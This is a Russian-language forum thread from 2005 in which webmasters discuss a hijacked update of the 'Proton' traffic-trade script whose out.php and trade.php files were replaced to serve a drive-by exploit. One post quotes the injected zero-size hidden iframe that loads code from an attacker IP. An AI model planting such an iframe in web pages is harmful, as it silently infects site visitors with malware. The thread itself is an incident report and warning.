Что с протоном? Не обновляйте, это ахтунг!

Сегодня ткнул на апдейт протона и мне на все страницы сиджа заебенили експлойт. Exploit.HTML.Mht
Грузиццо он отсюда 85.255.113.10

http://www.proton-tm.com/forum/ - та же история.

Вот такая вот неприятная картина вырисовывается.

Зашёл с тестовой тачки. Чёто грузанулось. Посмотрим чего продают.

Похоже поломали их.

Мля внатуре! меня тоже ломанули. оут пхп

<iframe SRC="http://85.255.113.18/inc/nan23.html" WIDTH=0 BORDER=0 HEIGHT=0></iframe>
Zend

trade.php тоже самое

Последний раз редактировалось: Lorix (17/09/05 в 14:13), всего редактировалось 1 раз

Продают антиспайваре TOP ANTI SPYWARE + PPC. НЕ ДЕЛАЙТЕ АПДЕЙТ ПРОТОНА !

Да, парни продумались Это ж скоко трафа нахаляву!!!

Короче грузят ППЦ и продают софт. 171 это я так понимаю ID этого адверта.
http://www.clicksearchclick.biz/index.php
http://topantispyware.com/overview.php?171

Предлагаю админам этот топик залочить наверху, до решения этой проблемы.

Последний раз редактировалось: Scrudge (17/09/05 в 14:23), всего редактировалось 1 раз

какие они ещё файлы подменили?

Одного out.php достаточно, что бы весь траф протоновский заражать.

Это что получается?
Какие-то ребятишки поломали сайт,
изменили линк в сурсах, зазендили,
и ещё положили куда надо?

Что то мне не верится :-)

Замените файлы на старые. Вчерашний апдейт:
http://www.viva-host.com/proton.html

Желаю удачи.

Это просто пиздец. Я обязательно докопаюсь до истины и найду того, кто это сделал.
Ситуация такая - кто-то изменил 2 файла на нашем сервере, trade.php и out.php и сделал 'апдейт'. Кто успел его поставить - поставили вместо оригинальных фалов файлы с вирусом (что он делает - я еще не разобрался).
Сейчас (15.49 МСК) на сервере уже лежат ОРИГИНАЛЬНЫЕ, правильные файлы, можете смело обновляться.

Ифрейм ставился от парнерки toolbarparter (как минимум). Прошу владельца партнерки появиться здесь, и рассказать всем как лечится от бяки.

Приношу всем пользователям Протона извинения за случившееся (
Буду информировать о развитии событий в этом топике.

LOVE писал:

Замените файлы на старые. Вчерашний апдейт: http://www.viva-host.com/proton.html Желаю удачи.

Love красавчик, спасибо большое

Kildoozer писал:

Это просто пиздец. Я обязательно докопаюсь до истины и найду того, кто это сделал. Ситуация такая - кто-то изменил 2 файла на нашем сервере, trade.php и out.php и сделал 'апдейт'. Кто успел его поставить - поставили вместо оригинальных фалов файлы с вирусом (что он делает - я еще не разобрался). Сейчас (15.49 МСК) на сервере уже лежат ОРИГИНАЛЬНЫЕ, правильные файлы, можете смело обновляться. Ифрейм ставился от парнерки toolbarparter (как минимум). Прошу владельца партнерки появиться здесь, и рассказать всем как лечится от бяки. Приношу всем пользователям Протона извинения за случившееся :(( Буду информировать о развитии событий в этом топике.

пиши/стучи владельцам партнёрки пусть баннят акк

Я сегодня хотел проинсталить протон... так и не вышло...писало мол проблемы с Zend.... после этого ... в командере появился какой то левый доступ к фтп... flatbox.nl ... вот такой вот....

Сейчас сижу хаотично меняю везде пароли...

Что то уже известно что эти чупакабры могли запоганить?

Утром задумался что за нах если апдейт недавно был + делаю его постоянно показывает что ошибка с переменными типо 777 не стоит =(

Я часа 2 менял переменные, потом подключил хостера с ним меняли часа 2 - не получилось в конце концов не получилось решил проверить скрипт - БАБАХ ! ну думаю ДОПОМЕНЯЛИСЬ !

Захожу на форум - читаю ... БАБАХ номер Два !

Быстро вытащил с вчерашнего бэк апа 2 файлы trade.php и out.php

всё пока вроде работает !

Спасибо за out.php
А то сразу trade упал.

А у меня как оказалось и admin.php слетел.

fazer писал:

Сейчас сижу хаотично меняю везде пароли...

Пользуй касперского. Он эту шляпу сразу поймал и удалил нах.

Mua-ha-ha-ha!
тревожный апдейт.
пацаны постарались поднасрать - беспредел. Хоть бы фильтры на русских ставили.
Мораль - опасность! Инсталим Аврору )

С уважением, нах.

roxx писал:

Пользуй касперского. Он эту шляпу сразу поймал и удалил нах.

пользуйтесь аутпостом(отключаем активх, vb, скрытые фрэймы) и вам будет счастье :)

leetdesign писал:

пользуйтесь аутпостом(отключаем активх, vb, скрытые фрэймы) и вам будет счастье

Не, аутпост - это параноя) Он сЦуко вообще всё обрубает нах. Может его и можно как-то настроить гибко, но я неосилил.

вот как оно бывает

Встречный вопрос. Как можно заметить скрипт out.php на точно такой же но с ифреймом. Да еще и закодированный Зендом ?

Файл был заменен на файл с ифреймом и одним словом 'Zend'. Размер этого файла 90 байт, у меня осталась копия.

Уязвимость на сервере бела наедена и устранена, все оказалось гораздо проще чем мы думали

Человек, который это сделал найден, через одну небезызвестную партнерку. Владелец партнерки отказался сообщать номер его аси. Самое интересное, что владелец партнерки прекрасно знает, что человек этот специализируется на хаке сайтов, но отказываться работать с ним не собирается, и более того, он мне сказал '****** не трогает сайты принадлежащие русским авм'ам. наверное не знал. скажу ему.' Замечательно просто, какой благородный человек, русских он не трогает!
Как только все выяснится и подтвердится на 100% - сообщу кто он такой, пусть ВСЕ спонсоры забанят его у себя. Зла на него не хватает.

Последний раз редактировалось: Kildoozer (18/09/05 в 12:46), всего редактировалось 1 раз

дабл пост.